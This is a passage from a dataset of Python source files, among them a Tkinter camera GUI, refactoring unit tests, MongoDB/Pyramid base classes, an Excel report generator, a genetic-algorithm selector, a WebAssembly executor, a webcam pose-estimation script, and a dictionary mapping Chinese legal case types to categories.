panel is None, we need to initialize it\n\t\t\t\tif self.panel is None:\n\t\t\t\t\tself.panel = Label(self.center,image=img)\n\t\t\t\t\tself.panel.image = img\n\t\t\t\t\t#self.panel.pack(side='left', expand='yes', padx=10, pady=10)\n\t\t\t\t\tself.panel.grid(row=0, column=1, sticky=\"nsew\")\n\n\t\t\t\telse:\n\t\t\t\t\tself.panel.configure(image=img)\n\t\t\t\t\tself.panel.image = img\n\t\t\t\tself.panel.after(10,self.videoLoop)\n\t\texcept Exception as e:\n\t\t\tprint(\"[ERROR] {}\".format(e))\n\n\tdef setFilterChoice(self, n):\n\t\tself.filterChoice = n\n\t\tprint('[INFO] Filter selected: {}'.format(self.fc.filters[n]))\n\n\tdef takeSnapshot(self):\n\t\t# grab current timestamp and construct the output path\n\t\tts = datetime.datetime.now()\n\t\tfilename = '{}.jpg'.format(ts.strftime('%Y%b%d_%H%M%S'))\n\t\tp = os.path.sep.join((self.outPath, filename))\n\n\t\t# save file\n\t\tcv2.imwrite(p, self.frame.copy())\n\t\tprint(\"[INFO] saved {}\".format(filename))\n\n\tdef onClose(self):\n\t\t# set stop event, cleanup the camera\n\t\t# allow rest of the quit process to continue\n\t\tprint(\"[INFO] closing...\")\n\t\tself.stopEvent.set()\n\t\tself.vs.stop()\n\t\tself.root.quit()\n","sub_path":"faceTk.py","file_name":"faceTk.py","file_ext":"py","file_size_in_byte":4921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"153159463","text":"import unittest\nfrom init import test_data\nfrom python_package.rfrefactoring.refactoringFacade import RefactoringFacade\nfrom python_package.rfrefactoring.testDataVisitor import FindVisitor\nfrom python_package.rfrefactoring.reference import Reference\nfrom python_package.rfrefactoring.referencesMethods import get_present_method, get_replace_method\nclass RefactoringFacadeTest(unittest.TestCase):\n def setUp(self):\n self.facade = RefactoringFacade()\n self.root = self.facade.build(test_data)\n\n def test_rename_keyword_def(self):\n source = test_data+'/ezScrum.txt'\n login_ezScrum = self.facade.get_keyword_obj_from_file(self.root, 'Login EzScrum', source)\n new_kw_name = 'Login EzScrum V4'\n self.assertIsNotNone(login_ezScrum)\n self.facade.rename_keyword_def(login_ezScrum, new_kw_name)\n login_ezScrum_v4 = self.facade.get_keyword_obj_from_file(self.root, new_kw_name, source)\n self.assertIsNotNone(login_ezScrum_v4)\n \n def test_rename_variable_def(self):\n source = test_data+'/testResource.txt'\n variable = self.facade.get_variable_obj_from_file(self.root, '${resourceFileVariable}', source)\n new_var_name = 'resourceVariable'\n self.assertIsNotNone(variable)\n self.facade.rename_variable_def(variable, new_var_name)\n new_variable = self.facade.get_variable_obj_from_file(self.root, \"${%s}\" %new_var_name, source)\n self.assertIsNotNone(new_variable)\n\n def test_rename_keyword_references(self):\n source = test_data+'/ezScrum.txt'\n login_ezScrum = self.facade.get_keyword_obj_from_file(self.root, 'Login EzScrum', source)\n self.assertIsNotNone(login_ezScrum)\n references = self.facade.get_keyword_references(self.root, login_ezScrum)\n self.assertEqual(4, len(references))\n new_kw_name = 'Login EzScrum v3'\n total_references = []\n for reference in references:\n total_references.extend(reference['references'])\n self.assertEqual(6, len(total_references))\n self.facade.rename_keyword_references(total_references, login_ezScrum.name, new_kw_name)\n self.facade.rename_keyword_def(login_ezScrum, new_kw_name)\n login_ezScrum_v3 = self.facade.get_keyword_obj_from_file(self.root, new_kw_name, source)\n 
new_kw_references = self.facade.get_keyword_references(self.root, login_ezScrum_v3)\n self.assertEqual(4, len(new_kw_references))\n total_references_after_rename = []\n for reference in references:\n total_references_after_rename.extend(reference['references'])\n self.assertEqual(6, len(total_references_after_rename))\n\n def test_rename_variable_references(self):\n source = test_data+'/testResource.txt'\n variable_name = '${resourceFileVariable}'\n new_var_name = 'newResourceVariable'\n resourceVariable = self.facade.get_variable_obj_from_file(self.root, variable_name, source)\n self.assertIsNotNone(resourceVariable)\n references = self.facade.get_variable_references(self.root, resourceVariable)\n self.assertEqual(1, len(references))\n total_references = []\n for reference in references:\n total_references.extend(reference['references'])\n self.assertEqual(4, len(total_references))\n self.facade.rename_variable_references(total_references, resourceVariable.name, new_var_name)\n self.facade.rename_variable_def(resourceVariable, new_var_name)\n newResourceVariable = self.facade.get_variable_obj_from_file(self.root, '${%s}' %new_var_name, source)\n new_kw_references = self.facade.get_variable_references(self.root, newResourceVariable)\n self.assertEqual(len(references), len(new_kw_references))\n total_references_after_rename = []\n for reference in references:\n total_references_after_rename.extend(reference['references'])\n self.assertEqual(len(total_references), len(total_references_after_rename))","sub_path":"python_package/test/refactoringFacadeTest.py","file_name":"refactoringFacadeTest.py","file_ext":"py","file_size_in_byte":4006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"480423319","text":"\"\"\"\n:mod:`piano.libs.base`\n----------------------\n\n.. autoclass:: ContextBase\n :members:\n \n.. autoclass:: DocumentBase\n\n\"\"\"\nfrom piano.resources import interfaces as i\nfrom mongokit import Document\nfrom pyramid.traversal import find_interface, find_root\n\nclass ContextBase(dict):\n \"\"\" Base (abstract) class for all resources (contexts).\n \"\"\"\n __name__ = None\n __parent__ = None\n __app__ = None\n __site__ = None\n \n def __init__(self, key=None, parent=None,**kwargs):\n self.__name__ = key\n self.__parent__ = parent\n # Reference request\n self.request = find_root(self).request\n # Reference app and site\n self.__app__ = find_interface(self, i.IApp)\n self.__site__ = find_interface(self, i.ISite)\n # Assign kwargs to self (used as self.XXX not self['xxx'])\n for key in kwargs:\n setattr(self, key, kwargs[key])\n \n @property\n def appname(self):\n \"\"\"Returns the name of the application. \n \"\"\"\n return self.__app__.__name__\n \n @property\n def sitename(self):\n \"\"\"Returns the name of the site. \n \"\"\"\n return self.__site__.__name__\n \n def get_conn(self, app=None, site=None):\n \"\"\"Returns a raw MongoDB connection. If none of the arguments are\n set it will try to configure the connection based on the instance's\n app and site name. 
Otherwise, it is up to you to choose the\n database and collection to use.\n \"\"\"\n mongo_conn = self.request.conn\n # If no app or site, autoconfigure the connection\n if app is None and site is None:\n return mongo_conn[self.appname][self.sitename]\n #If app or site, build up the connection\n if app is not None:\n mongo_conn = mongo_conn[app]\n if site is not None:\n mongo_conn = mongo_conn[site]\n return mongo_conn\n \n \nclass DocumentBase(Document):\n \"\"\" Base (abstract) class for all documents (MongoDB).\n \"\"\"\n #: Use MongoKit '.' notation\n use_dot_notation = False\n #: Require schemas to be defined up-front\n use_schemaless = False\n #: Validate models.\n skip_validation = False","sub_path":"build/lib/piano/lib/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"546800873","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nfrom collections import defaultdict\nfrom string import ascii_uppercase\n\nimport xlsxwriter\nfrom customer import get_customers\nfrom kuorimo.misc.database import Database\nfrom product import get_products\n\n\ndef get_report(d, customer_number, year, month):\n cursor = d.get_cursor()\n query = \"\"\" SELECT orders.date AS order_date,\n product.name AS product_name,\n product.number AS product_number, SUM(orders.amount) AS total\n FROM orders \n JOIN product ON orders.prod_number=product.number\n WHERE orders.cust_number=? AND strftime('%Y%m', orders.date)=?\n GROUP BY orders.prod_number, orders.date\n ORDER by orders.date, product.name\"\"\"\n\n results = defaultdict(list)\n period = year + str(month).zfill(2)\n db_result = cursor.execute(query, (customer_number, period))\n for item in db_result:\n results[item['order_date']].append((item['product_number'], item['total']))\n cursor.close()\n return results\n\n\nclass XlsReportGenerator(object):\n \"\"\"Generate xls report, each customer in its own worksheet\"\"\"\n\n def __init__(self, year, month, path_to_report):\n self.month = month\n self.year = str(year)\n self.db = Database()\n self.workbook = xlsxwriter.Workbook(path_to_report)\n # Add formats to use to highlight cells.\n self.bold = self.workbook.add_format({'bold': True})\n self.bold_red = self.workbook.add_format({'bold': True, 'font_color': 'red'})\n self.bold_sized = self.workbook.add_format({'bold': True, 'font_size': 14})\n self.bold_bg_gray = self.workbook.add_format({'bold': True, 'font_color': 'white', 'bg_color': 'gray'})\n self.bold_bg_gray_sized = self.workbook.add_format({'bold': True,\n 'font_color': 'white',\n 'font_size': 13,\n 'bg_color': 'gray'})\n\n # Create a format to use in the merged range.\n self.merge_format = self.workbook.add_format({'bold': True, 'font_size': 14, 'align': 'center'})\n\n self.worksheets = {}\n self.customers = {}\n self.products = {}\n\n def generate_workbook(self):\n for customer in get_customers(self.db):\n customer_name = customer['name']\n customer_number = customer['number']\n self.customers[customer_number] = customer_name\n worksheet = self.workbook.add_worksheet(customer_name)\n worksheet.set_column('A:A', 14)\n worksheet.write('A3', 'Date', self.bold_bg_gray)\n for product, cell_letter in zip(get_products(self.db), ascii_uppercase[1:]):\n worksheet.set_column('%s:%s' % (cell_letter, cell_letter), 13)\n worksheet.write(cell_letter + '3', product['name'], self.bold_bg_gray)\n self.products[product['number']] = cell_letter\n\n 
self.worksheets[customer['number']] = worksheet\n\n def generate_worksheet(self, customer_number, customer_name):\n reports = get_report(self.db, customer_number, self.year, self.month)\n dates = sorted(reports.keys())\n\n # print the name of the customer to be able to generate PDF file\n customer_text = \"{}/{}\".format(customer_number, customer_name.upper())\n self.worksheets[customer_number].merge_range('A1:C1', customer_text, self.merge_format)\n\n cell_number = 4\n for date in dates:\n date_cell = 'A' + str(cell_number)\n self.worksheets[customer_number].write(date_cell, date)\n rows = reports[date]\n for product_number, total in rows:\n product_cell = self.products[product_number] + str(cell_number)\n self.worksheets[customer_number].write(product_cell, total)\n cell_number += 1\n\n if reports:\n self.worksheets[customer_number].write('A' + str(cell_number + 2), 'Total', self.bold_bg_gray_sized)\n for cell_letter in ascii_uppercase[1: len(self.products) + 1]:\n self.worksheets[customer_number].write(cell_letter + str(cell_number + 2),\n '=SUM(%s:%s)' % (cell_letter + '2',\n cell_letter + str(cell_number - 1)),\n self.bold_bg_gray_sized)\n\n def generate_report(self):\n self.generate_workbook()\n for customer_number, customer_name in self.customers.items():\n self.generate_worksheet(customer_number, customer_name)\n self.workbook.close()\n\n\ndef generate_report(year, month, path):\n g = XlsReportGenerator(year, month, path)\n g.generate_report()\n return os.path.exists(path)\n\nif __name__ == '__main__':\n\n path = '/Users/skocle/Desktop/demo.xlsx'\n generate_report(2017, 9, path)","sub_path":"src/kuorimo/api/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"262627193","text":"#!/bin/python3\n\nfrom geneticSelectors.selector import Selector\n\nimport random as rd\n\nclass Tournaments1Selector(Selector):\n def __init__(self, N):\n super().__init__(N)\n \n def select(self, group, K):\n selected = []\n for tournament in range(K):\n x, y = rd.sample(group, 2)\n winner = max(x, y)\n selected.append(winner)\n return selected\n\n","sub_path":"TP2/geneticSelectors/tournaments1Selector.py","file_name":"tournaments1Selector.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"255938419","text":"import logging\nfrom ._instantiate import instantiate\nfrom . import wasi\n\n\nlogger = logging.getLogger(\"wasm-execute\")\n\n\ndef execute_wasm(module, args, target=\"python\", function=None, reporter=None):\n \"\"\" Execute the given wasm module. 
\"\"\"\n wasi_api = wasi.WasiApi()\n imports = {\n \"wasi_unstable\": {\n \"fd_prestat_get\": wasi_api.fd_prestat_get,\n \"fd_prestat_dir_name\": wasi_api.fd_prestat_dir_name,\n \"clock_time_get\": wasi_api.clock_time_get,\n \"proc_exit\": wasi_api.proc_exit,\n \"fd_fdstat_get\": wasi_api.fd_fdstat_get,\n \"fd_close\": wasi_api.fd_close,\n \"args_sizes_get\": wasi_api.args_sizes_get,\n \"args_get\": wasi_api.args_get,\n \"fd_seek\": wasi_api.fd_seek,\n \"fd_write\": wasi_api.fd_write,\n \"environ_sizes_get\": wasi_api.environ_sizes_get,\n \"environ_get\": wasi_api.environ_get,\n }\n }\n instance = instantiate(module, imports, target=target, reporter=reporter)\n\n logger.info(\"Created instance %s\", instance)\n\n # Hack hack hack, give wasi api access to the instance:\n # This is handy for memory access.\n wasi_api._instance = instance\n\n if function:\n # Run a specific function in the wasm module\n result = instance.exports[function](*args)\n print(\"Result:\", result)\n else:\n # Assume WASI\n instance.exports[\"_start\"]()\n","sub_path":"ppci/wasm/execution/execute.py","file_name":"execute.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"103556109","text":"\n# coding: utf-8\n\n# In[1]:\nimport time\n\n\nimport os\nimport sys\nimport numpy as np\nimport cv2\n#sys.path.append(os.path.dirname(__file__) + \"/../\")\nfrom scipy.misc import imread, imsave\nfrom skimage.measure import structural_similarity as ssim\nfrom config import load_config\nfrom dataset.factory import create as create_dataset\nfrom nnet import predict\nfrom util import visualize\nimport cv2\nfrom dataset.pose_dataset import data_to_input\n\n\nfrom multiperson.detections import extract_detections\nfrom multiperson.predict import SpatialModel, eval_graph, get_person_conf_multicut\nfrom multiperson.visualize import PersonDraw, visualize_detections\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\n\n# In[10]:\n\n\ndef mse(imageA,imageB):\n err = np.sum((imageA.astype(\"float\")-imageB.astype(\"float\"))**2)\n err /= float(imageA.shape[0]*imageA.shape[1])\n return err\n\ndef compare_images(imageA, imageB, title):\n m = mse(imageA, imageB)\n s = ssim(imageA, imageB)\n fig = plt.figure(title)\n plt.suptitle(\"MSE: %.2f, SSIM: %.2f\" % (m, s))\n\n ax = fig.add_subplot(1, 2, 1)\n plt.imshow(imageA, cmap = plt.cm.gray)\n plt.axis(\"off\")\n ax = fig.add_subplot(1, 2, 2)\n \n plt.imshow(imageB, cmap = plt.cm.gray)\n plt.axis(\"off\")\n plt.show()\n \n return(s,m)\n\n\n# In[6]:\n\ndef main():\n start_time=time.time()\n print(\"main hai\")\n tf.reset_default_graph()\n cfg = load_config(\"demo/pose_cfg_multi.yaml\")\n dataset = create_dataset(cfg)\n sm = SpatialModel(cfg)\n sm.load()\n draw_multi = PersonDraw()\n # Load and setup CNN part detector\n sess, inputs, outputs = predict.setup_pose_prediction(cfg)\n\n # Read image from file\n dir=os.listdir(\"stick\")\n k=0\n cap=cv2.VideoCapture(0)\n i=0\n while (cap.isOpened()):\n if i%20 == 0: \n ret, orig_frame= cap.read()\n if ret==True:\n frame = cv2.resize(orig_frame, (0, 0), fx=0.30, fy=0.30)\n image= frame\n sse=0\n mse=0\n \n image_batch = data_to_input(frame)\n\n # Compute prediction with the CNN\n outputs_np = sess.run(outputs, feed_dict={inputs: image_batch})\n\n scmap, locref, pairwise_diff = predict.extract_cnn_output(outputs_np, cfg, dataset.pairwise_stats)\n\n detections = extract_detections(cfg, scmap, locref, pairwise_diff)\n\n unLab, pos_array, unary_array, 
pwidx_array, pw_array = eval_graph(sm, detections)\n\n person_conf_multi = get_person_conf_multicut(sm, unLab, unary_array, pos_array)\n img = np.copy(image)\n #coor = PersonDraw.draw()\n visim_multi = img.copy()\n co1=draw_multi.draw(visim_multi, dataset, person_conf_multi)\n plt.imshow(visim_multi)\n plt.show()\n visualize.waitforbuttonpress()\n #print(\"this is draw : \", co1)\n if k==1:\n qwr = np.zeros((1920,1080,3), np.uint8)\n\n cv2.line(qwr, co1[5][0], co1[5][1],(255,0,0),3)\n cv2.line(qwr, co1[7][0], co1[7][1],(255,0,0),3)\n cv2.line(qwr, co1[6][0], co1[6][1],(255,0,0),3)\n cv2.line(qwr, co1[4][0], co1[4][1],(255,0,0),3)\n\n cv2.line(qwr, co1[9][0], co1[9][1],(255,0,0),3)\n cv2.line(qwr, co1[11][0], co1[11][1],(255,0,0),3)\n cv2.line(qwr, co1[8][0], co1[8][1],(255,0,0),3)\n cv2.line(qwr, co1[10][0], co1[10][1],(255,0,0),3)\n # In[9]:\n cv2.imshow('r',qwr)\n qwr2=\"stick/frame\"+str(k)+\".jpg\"\n qw1 = cv2.cvtColor(qwr, cv2.COLOR_BGR2GRAY)\n qw2= cv2.cvtColor(qwr2, cv2.COLOR_BGR2GRAY)\n\n fig = plt.figure(\"Images\")\n images = (\"Original\", qw1), (\"Contrast\", qw2)\n for (i, (name, image)) in enumerate(images):\n ax = fig.add_subplot(1, 3, i + 1)\n ax.set_title(name)\n plt.imshow(hash(tuple(image)))\n # compare the images\n s,m=compare_images(qw1, qw2, \"Image1 vs Image2\")\n k+=1\n sse=s\n mse=m\n\n else:\n break\n elapsed= time.time()-start_time\n #print(\"sse score : \", sse)\n print(\"Mean squared error : \", elapsed/100)\n cap.release()\n cv2.destroyAllWindows()\n\nif __name__=='__main__':\n main()","sub_path":"finalmost.py","file_name":"finalmost.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"562176770","text":"# -*- coding: utf-8 -*-\r\nfrom src.head import *\r\ncase_map_dict = {\r\n u'侵害作品翻译权纠纷': u'知识产权权属侵权纠纷',\r\n u'侵占罪': u'侵犯财产罪',\r\n u'多式联运合同纠纷': u'合同纠纷',\r\n u'名誉权纠纷': u'人格权纠纷',\r\n u'代为继承': u'继承纠纷',\r\n u'公示催告': u'公示催告程序案件',\r\n u'资敌罪': u'危害国家安全罪',\r\n u'战时残害居民、掠夺居民财物罪': u'军人违反职责罪',\r\n u'滥用管理公司、证券职权罪': u'渎职罪',\r\n u'破坏军婚罪': u'侵犯公民人身权利、民主权利罪',\r\n u'盗掘古人类化石、古脊椎动物化石罪': u'妨害社会管理秩序罪',\r\n u'颁发': u'行政管理与行政行为',\r\n u'表演合同纠纷': u'知识产权合同纠纷',\r\n u'股权转让纠纷': u'与公司有关的纠纷',\r\n u'取回权': u'信用证纠纷',\r\n u'战时拒绝、逃避征召、军事训练罪': u'危害国防利益罪',\r\n u'生命权健康权身体权纠纷': u'人格权纠纷',\r\n u'侵害企业名称(商号)权纠纷': u'知识产权权属侵权纠纷',\r\n u'违反': u'行政管理与行政行为',\r\n u'离婚纠纷': u'婚姻家庭纠纷',\r\n u'强迫劳动罪': u'侵犯公民人身权利、民主权利罪',\r\n u'噪声污染责任纠纷': u'侵权责任纠纷',\r\n u'企业出资人权益确认纠纷': u'与企业有关的纠纷',\r\n u'广播组织': u'知识产权权属侵权纠纷',\r\n u'保证责任': u'合同纠纷',\r\n u'信用卡': u'合同纠纷',\r\n u'分期付款': u'合同纠纷',\r\n u'银行结算合同纠纷': u'合同纠纷',\r\n u'医疗合同': u'合同纠纷',\r\n u'仿冒纠纷': u'不正当竞争纠纷',\r\n u'施工': u'合同纠纷',\r\n u'放映权': u'知识产权权属侵权纠纷',\r\n u'煽动分裂国家罪': u'危害国家安全罪',\r\n u'追收非正常收入纠纷': u'与���产有关的纠纷',\r\n u'集资诈骗罪': u'破坏社会主义市场经济秩序罪',\r\n u'失业': u'劳动争议',\r\n u'操纵期货': u'期货交易纠纷',\r\n u'出版歧视、侮辱少数民族作品罪': u'侵犯公民人身权利、民主权利罪',\r\n u'商业贿赂': u'不正当竞争纠纷',\r\n u'林业承包合同纠纷': u'合同纠纷',\r\n u'阻碍执行军事职务罪': u'军人违反职责罪',\r\n u'公司合并': u'与公司有关的纠纷',\r\n u'非法行医罪': u'妨害社会管理秩序罪',\r\n u'储蓄存款': u'合同纠纷',\r\n u'技术中介合同纠纷': u'知识产权合同纠纷',\r\n u'证券投资基金': u'信用证纠纷',\r\n u'项下款项': u'申请保全案件',\r\n u'捕捞权': u'用益物权纠纷',\r\n u'船员劳务合同纠纷': u'海事海商纠纷',\r\n u'著作权许可': u'知识产权合同纠纷',\r\n u'群众性活动组织者责任纠纷': u'侵权责任纠纷',\r\n u'走私普通货物、物品罪': u'破坏社会主义市场经济秩序罪',\r\n u'荣誉权': u'人格权纠纷',\r\n u'有线电视服务合同纠纷': u'合同纠纷',\r\n u'探望权纠纷': u'婚姻家庭纠纷',\r\n u'质押式证券回购纠纷': u'证券纠纷',\r\n u'生产、销售有毒、有害食品罪': u'破坏社会主义市场经济秩序罪',\r\n u'证券发行纠纷': u'证券纠纷',\r\n u'海事债权登记与受偿': u'海事诉讼特别程序案件',\r\n u'武器装备肇事罪': u'军人违反职责罪',\r\n u'公证损害': u'侵权责任纠纷',\r\n u'监护权纠纷': u'婚姻家庭纠纷',\r\n u'间谍罪': 
u'危害国家安全罪',\r\n u'民事、行政枉法裁判罪': u'渎职罪',\r\n u'侵害表演者权纠纷': u'知识产权权属侵权纠纷',\r\n u'探矿权转让': u'合同纠纷',\r\n u'决定': u'行政管理与行政行为',\r\n u'放火罪': u'危害公共安全罪',\r\n u'仲裁': u'仲裁程序案件',\r\n u'车辆建造': u'合同纠纷',\r\n u'盗窃、抢夺武装部队公文、证件、印章罪': u'危害国防利益罪',\r\n u'借款合同纠纷': u'合同纠纷',\r\n u'申请确认仲裁协议效力': u'仲裁程序案件',\r\n u'公司债券权利确认纠纷': u'证券纠纷',\r\n u'非法生产、买卖警用装备罪': u'妨害社会管理秩序罪',\r\n u'建筑物、构筑物倒塌损害责任纠纷': u'侵权责任纠纷',\r\n u'播放': u'知识产权权属侵权纠纷',\r\n u'生产、销售不符合安全标准的食品罪': u'破坏社会主义市场经济秩序罪',\r\n u'捆绑销售不正当竞争纠纷': u'不正当竞争纠纷',\r\n u'肖像权纠纷': u'人格权纠纷',\r\n u'过失投放危险物质罪': u'危害公共安全罪',\r\n u'非法制造、销售非法制造的注册商标标识罪': u'破坏社会主义市场经济秩序罪',\r\n u'技术成果完成人署名权荣誉权奖励权纠纷': u'知识产权合同纠纷',\r\n u'保证合同': u'合同纠纷',\r\n u'职务技术成果': u'知识产权合同纠纷',\r\n u'非法生产、买卖武装部队制式服装罪': u'危害国防利益罪',\r\n u'窝藏、转移、隐瞒毒品、毒赃罪': u'妨害社会管理秩序罪',\r\n u'为境外窃取、剌探、收买、非法提供国家秘密、情报罪': u'危害国家安全罪',\r\n u'追收未缴出资纠纷': u'与破产有关的纠纷',\r\n u'别除权': u'信用证纠纷',\r\n u'音像制品制作': u'知识产权合同纠纷',\r\n u'诽谤罪': u'侵犯公民人身权利、民主权利罪',\r\n u'雇用逃离部队军人罪': u'危害国防利益罪',\r\n u'经济适用房转让合同纠纷': u'合同纠纷',\r\n u'出版合同': u'知识产权合同纠纷',\r\n u'过失决水罪': u'危害公共安全罪',\r\n u'买卖合同纠纷': u'合同纠纷',\r\n u'侵害作品出租权纠纷': u'知识产权权属侵权纠纷',\r\n u'工伤保险待遇纠纷': u'劳动争议',\r\n u'植物新品种合同纠纷': u'知识产权合同纠纷',\r\n u'解除收养关系纠纷': u'婚姻家庭纠纷',\r\n u'委托合同': u'合同纠纷',\r\n u'检验': u'合同纠纷',\r\n u'非法占有高度危险物损害责任纠纷': u'侵权责任纠纷',\r\n u'企业商号': u'知识产权权属侵权纠纷',\r\n u'储蓄存款合同纠纷': u'合同纠纷',\r\n u'人民调解代理': u'合同纠纷',\r\n u'非法侵入住宅罪': u'侵犯公民人身权利、民主权利罪',\r\n u'申请认可和执行香港特别行政区法院民事判决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'网络服务合同纠纷': u'合同纠纷',\r\n u'聘用合同争议': u'人事争议',\r\n u'打击报复会计、统计人员罪': u'侵犯公民人身权利、民主权利罪',\r\n u'申请拍卖扣押船用燃油及船用物料': u'海事诉讼特别程序案件',\r\n u'劳动报酬': u'劳动争议',\r\n u'倒卖文物罪': u'妨害社会管理秩序罪',\r\n u'伪造': u'不正当竞争���纷',\r\n u'民用航空运输': u'合同纠纷',\r\n u'挂靠': u'与企业有关的纠纷',\r\n u'暴力取证罪': u'侵犯公民人身权利、民主权利罪',\r\n u'土地承包经营权互换合同纠纷': u'合同纠纷',\r\n u'装潢': u'合同纠纷',\r\n u'有奖销售': u'不正当竞争纠纷',\r\n u'技术出口': u'知识产权合同纠纷',\r\n u'票据利益返还请求权纠纷': u'票据纠纷',\r\n u'复制合同纠纷': u'合同纠纷',\r\n u'金融凭证诈骗罪': u'破坏社会主义市场经济秩序罪',\r\n u'假冒': u'知识产权权属侵权纠纷',\r\n u'传染病防治失职罪': u'渎职罪',\r\n u'撤销仲裁': u'仲裁程序案件',\r\n u'损害债务人利益赔偿纠纷': u'与破产有关的纠纷',\r\n u'商业秘密合同纠纷': u'知识产权合同纠纷',\r\n u'期货虚假': u'期货交易纠纷',\r\n u'融资融券': u'信用证纠纷',\r\n u'土地承包经营权纠纷': u'用益物权纠纷',\r\n u'包庇毒品犯罪分子罪': u'妨害社会管理秩序罪',\r\n u'损害股东利益责任纠纷': u'与公司有关的纠纷',\r\n u'非法拘禁罪': u'侵犯公民人身权利、民主权利罪',\r\n u'海事支付令': u'海事诉讼特别程序案件',\r\n u'养殖权纠纷': u'用益物权纠纷',\r\n u'相邻通风纠纷': u'所有权纠纷',\r\n u'冒用': u'不正当竞争纠纷',\r\n u'非法留置船舶船载货物船用燃油船用物料损害责任纠纷': u'海事海商纠纷',\r\n u'滥伐林木罪': u'妨害社会管理秩序罪',\r\n u'国债交易纠纷': u'证券纠纷',\r\n u'航空运输人身损害责任纠纷': u'侵权责任纠纷',\r\n u'公司决议纠纷': u'与公司有关的纠纷',\r\n u'申请海事证据保全': u'海事诉讼特别程序案件',\r\n u'股东损害公司债权人利益责任纠纷': u'与公司有关的纠纷',\r\n u'非法持有宣扬恐怖主义、极端主义物品罪': u'危害公共安全罪',\r\n u'教育机构': u'侵权责任纠纷',\r\n u'债权债务概括转移合同纠纷': u'合同纠纷',\r\n u'宅基地使用权纠纷': u'用益物权纠纷',\r\n u'试用买卖合同纠纷': u'合同纠纷',\r\n u'无线网址': u'知识产权权属侵权纠纷',\r\n u'垄断定价纠纷': u'垄断纠纷',\r\n u'失踪人': u'宣告失踪、宣告死亡案件',\r\n u'期货保证合约纠纷': u'期货交易纠纷',\r\n u'保荐': u'证券纠纷',\r\n u'港口货物': u'海事海商纠纷',\r\n u'公路': u'合同纠纷',\r\n u'农业承包': u'合同纠纷',\r\n u'计算机': u'知识产权权属侵权纠纷',\r\n u'虚开增值税专用发票、用于骗取出口退税、抵扣税款发票罪': u'破坏社会主义市场经济秩序罪',\r\n u'供用电合同纠纷': u'合同纠纷',\r\n u'防卫过当损害责任纠纷': u'侵权责任纠纷',\r\n u'商标合同纠纷': u'知识产权合同纠纷',\r\n u'委托理财': u'合同纠纷',\r\n u'申请诉前停止侵害注册商标专用权': u'申请诉前停止侵害知识产权案件',\r\n u'发明专利': u'知识产权权属侵权纠纷',\r\n u'强奸罪': u'侵犯公民人身权利、民主权利罪',\r\n u'限定交易纠纷': u'垄断纠纷',\r\n u'欠款': u'合同纠纷',\r\n u'过失泄露国家秘密罪': u'渎职罪',\r\n u'缔约': u'合同纠纷',\r\n u'证券托管纠纷': u'证券纠纷',\r\n u'海运欺诈纠纷': u'海事海商纠纷',\r\n u'侵害集体经济组织': u'所有权纠纷',\r\n u'放射性污染责任纠纷': u'侵权责任纠纷',\r\n u'采矿权转让': u'合同纠纷',\r\n u'走私假币罪': u'破坏社会主义市场经济秩序罪',\r\n u'缔约过失责任纠纷': u'合同纠纷',\r\n u'包庇、纵容黑社会性质组织罪': u'妨害社会管理秩序罪',\r\n u'危险物品肇事罪': u'危害公共安全罪',\r\n u'土地租赁合同纠纷': u'合同纠纷',\r\n u'帮助毁灭、伪造证据罪': u'妨害社会管理秩序罪',\r\n u'失火罪': 
u'危害公共安全罪',\r\n u'侵害广播组织权纠纷': u'知识产权权属侵权纠纷',\r\n u'工程重大安全事故罪': u'危害公共安全罪',\r\n u'引诱、教唆、欺骗他人吸毒罪': u'妨害社会管理秩序罪',\r\n u'强令违章冒险作业罪': u'危害公共安全罪',\r\n u'申请执行': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'拒绝提供间谍犯罪、恐怖主义犯罪、极端主义犯罪证据罪': u'妨害社会管理秩序罪',\r\n u'帮助信息网络犯罪活动罪': u'妨害社会管理秩序罪',\r\n u'动产浮动抵押权纠纷': u'担保物权纠纷',\r\n u'申请诉中证据保全': u'申请保全案件',\r\n u'破坏永久性测量标志罪': u'妨害社会管理秩序罪',\r\n u'违规制造、销售枪支罪': u'危害公共安全罪',\r\n u'相邻污染侵害纠纷': u'所有权纠纷',\r\n u'补偿贸易': u'合同纠纷',\r\n u'资信评级': u'证券纠纷',\r\n u'饲养动物损害责任纠纷': u'侵权责任纠纷',\r\n u'返还原物': u'物权保护纠纷',\r\n u'诱骗投资者买卖证券、期货合约罪': u'破坏社会主义市场经济秩序罪',\r\n u'公司解散': u'与公司有关的纠纷',\r\n u'防卫过当': u'侵权责任纠纷',\r\n u'申请执行知识产权仲裁裁决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'上市': u'信用证纠纷',\r\n u'船舶代理合同纠纷': u'海事海商纠纷',\r\n u'证券欺诈': u'证券纠纷',\r\n u'旅店服务': u'合同纠纷',\r\n u'宣扬恐怖主义、极端主义、煽动实施恐怖活动罪': u'危害公共安全罪',\r\n u'侵犯集体经济组织': u'所有权纠纷',\r\n u'妨害传染病防治罪': u'妨害社会管理秩序罪',\r\n u'海上通海水域污染损害责任纠纷': u'海事海商纠纷',\r\n u'商品房': u'合同纠纷',\r\n u'信用证开证纠纷': u'信用证纠纷',\r\n u'房地产咨询合同纠纷': u'合同纠纷',\r\n u'投放危险物质罪': u'危害公共安全罪',\r\n u'转继承': u'继承纠纷',\r\n u'民间借贷纠纷': u'合同纠纷',\r\n u'非法处置进口的固体废物罪': u'妨害社会管理秩序罪',\r\n u'邻接权': u'知识产权权属侵权纠纷',\r\n u'土地承包经营权转包合同纠纷': 